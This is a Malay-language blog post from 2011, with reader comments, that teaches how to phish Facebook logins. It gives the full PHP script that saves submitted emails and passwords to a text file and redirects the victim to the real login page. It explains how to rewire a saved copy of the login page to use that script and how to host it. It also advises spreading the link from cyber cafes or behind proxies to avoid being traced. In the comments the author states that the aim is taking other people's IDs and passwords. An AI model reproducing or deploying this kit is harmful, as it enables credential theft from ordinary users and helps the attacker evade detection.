Sunday, 14 August 2011

Cara Hack Facebook - Phising


Atas permintaan sahabat, saya terangkan di sini cara untuk membuat phising. Cara ini hanyalah untuk rujukan pelajaran sahaja. Sebarang penyalahgunaan adalah tanggungjawab anda sendiri.


1. Buka laman utama Facebook, kemudian klik kiri dan pilih "save page as" dan save dengan nama fake.html.

Rujuk gambar di bawah untuk keterangan lanjut :


2. Sesudah itu buat satu .php file. Buka notepad anda dan salin ayat di bawah ini.

<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>

Kemudian save sebagai index.php

3. Buka fake.html anda tadi menggunakan notepad. ( Right-Click dan pilih "open with" pilih "notepad" )

4. Tekan butang CTRL+F dan cari perkataan "action". kemudian tukar perkataan https:www.facebook.com/login.php?login_attempt=1 kepada index.php.


5. Sesudah itu save fake.html anda tadi.

6. Buka notepad anda dan jangan tulis apa-apa cuma save sahaja sebagai password.txt

7. Gambar di bawah ini adalah 3 contoh file yang anda perlukan.


8. Sesudah itu upload semua file ini ke http://www.000webhost.com/ atau kemana saja laman web yang menyediakan php file hosting.



Peringatan : Saya cadangkan anda melakukan proses upload dan proses menyebarkan link phising ne melalui cyber cafe untuk mengelakkan anda dikesan.


Kecuali anda telah menggunakan Auto Hide IP / Proxy.

Elakkan diri anda daripada dikesan.

16 comments:

iLa VaNiLLa said...

muz mmg belajar IT eyh??

oPiE iSa said...

erk, apa faedah phising sifu?

sleeping_maniac90 said...

wah cra nk hack fb pun ad...
perghh..
mu memg hebat hehehe

NoKaKaSHiCHi HowyeaH!! said...

nice! :)

[fArAh aLiAs] said...

gi-la. agk keji kot.. hihi

abghani said...

ok good idea
i folw yr blog

Miss Eunice said...

haha..first time reading this..cooolll..tapi tak berani nak buat..wahahah..:D

dayu_myself said...

pergh..
terer ar ko...
tpi aku x phm l..hahahahha

NA said...

Tambah ilmu.

Tapi Kak Wina takde FB. Hehe..Muz sibuk lagi ke?

-wina1979-

forever yours said...

awk xjadi or lebih tepat xreti :(

muz said...

iLa VaNiLLa : ckit2 je..haha

oPiE iSa : untuk mendapatkan ID dan Password orang lain ne... :)

sleeping_maniac90 : Hehe, tapi tak dijamin berjaya sebab peluang phising amat tipis... :)

NoKaKaSHiCHi HowyeaH!! : Thx... :)

[fArAh aLiAs] : Keji gak lah sebab dah kira mencuri ne...hehe

abghani : Thx... :)

Miss Eunice : Hehe, kalo nak buat kena hati2 lah ye jangan sampai terkantoi ne... :)

dayu_myself : Bab mana ko tak reti tu...hehe

NA : Takda FB boleh guna yang lain, ckit2 jugalah kak.. :)

forever yours : Napa termasuk kat bahagian nak upload pergi web hosting tu ke?

wK said...

terBAIK ar bro....

nice share... nti aku nak try ar... hehe.

tp nak tanya muz. lau aku guna raptor vpn, ley kesan ke x ?

muz said...

sebenarnya benda ne tak boleh sukses 100% sebab browser biasa secara automatik akan mengesan link ini sebagai spam... Jadi memang susah untuk berjaya...

Anonymous said...

muz hack fb slalunye guna cara apa ?hehehe .. sje nak thu ,,

Mirza said...

Muz . macam mana nak upload file kat web hosting ?

Muz Rileks said...

@Mirza

Guna FTP biasanya...